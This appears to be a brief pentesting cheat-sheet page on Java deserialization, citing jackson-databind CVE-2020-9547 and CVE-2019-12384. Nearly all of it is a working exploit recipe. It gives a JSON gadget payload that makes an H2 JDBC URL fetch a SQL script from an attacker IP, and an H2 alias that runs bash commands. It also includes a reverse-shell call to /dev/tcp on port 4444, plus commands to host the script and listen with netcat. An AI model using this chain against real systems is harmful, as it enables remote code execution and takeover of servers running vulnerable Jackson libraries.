Serialization

Linux

CVE-2020-9547: FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
GitHub - jas502n/CVE-2019-12384: Jackson Rce For CVE-2019-12384
GitHub
1
1. Payload:
2
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPTFROM'http://10.10.xx.xx:443/sql.sql'"}]
3
4
2. Create file sql.sql with the target command
5
CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws java.io.IOException {
6
String[] command = {"bash", "-c", cmd};
7
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
8
return s.hasNext() ? s.next() : ""; }
9
$;
10
CALL SHELLEXEC('bash -i &>/dev/tcp/10.10.xxx.xxx/4444 0>&1 &')
11
12
3. python -m SimpleHTTPServer 443
13
14
4. nc -lvp 4444
Copied!
Last modified 5mo ago
Copy link